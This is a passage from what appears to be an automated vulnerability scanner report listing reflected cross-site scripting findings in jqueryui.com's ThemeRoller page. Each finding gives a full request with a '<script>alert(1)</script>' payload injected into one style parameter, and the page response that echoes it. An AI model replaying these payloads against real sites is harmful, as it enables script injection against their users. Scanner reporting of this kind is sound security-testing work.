a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxfe97e"><script>alert(1)</script>d413db24598&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

4.159. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0238"><script>alert(1)</script>f3b7584a347 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222a0238"><script>alert(1)</script>f3b7584a347&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222a0238"><script>alert(1)</script>f3b7584a347&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover
...[SNIP]...

4.160. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6908e"><script>alert(1)</script>f728313c9af was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e6908e"><script>alert(1)</script>f728313c9af&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e6908e"><script>alert(1)</script>f728313c9af&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_
...[SNIP]...

4.161. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70262"><script>alert(1)</script>3ef1456697c was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff70262"><script>alert(1)</script>3ef1456697c&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff70262"><script>alert(1)</script>3ef1456697c&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextu
...[SNIP]...

4.162. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb112"><script>alert(1)</script>0ae51754bf3 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987bb112"><script>alert(1)</script>0ae51754bf3&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987bb112"><script>alert(1)</script>0ae51754bf3&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

4.163. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 589a3"><script>alert(1)</script>546c2a2a8d6 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif589a3"><script>alert(1)</script>546c2a2a8d6&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif589a3"><script>alert(1)</script>546c2a2a8d6&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorCont
...[SNIP]...

4.164. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63655"><script>alert(1)</script>f4ad536432 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em63655"><script>alert(1)</script>f4ad536432&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em63655"><script>alert(1)</script>f4ad536432&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_
...[SNIP]...

4.165. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16422"><script>alert(1)</script>2726a46e7ea was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold16422"><script>alert(1)</script>2726a46e7ea&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:39:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold16422"><script>alert(1)</script>2726a46e7ea&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTe
...[SNIP]...

4.166. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2c17"><script>alert(1)</script>2ef784c42 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdde2c17"><script>alert(1)</script>2ef784c42&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120170

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdde2c17"><script>alert(1)</script>2ef784c42&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

4.167. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50c57"><script>alert(1)</script>7a42f2dba79 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d550c57"><script>alert(1)</script>7a42f2dba79&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow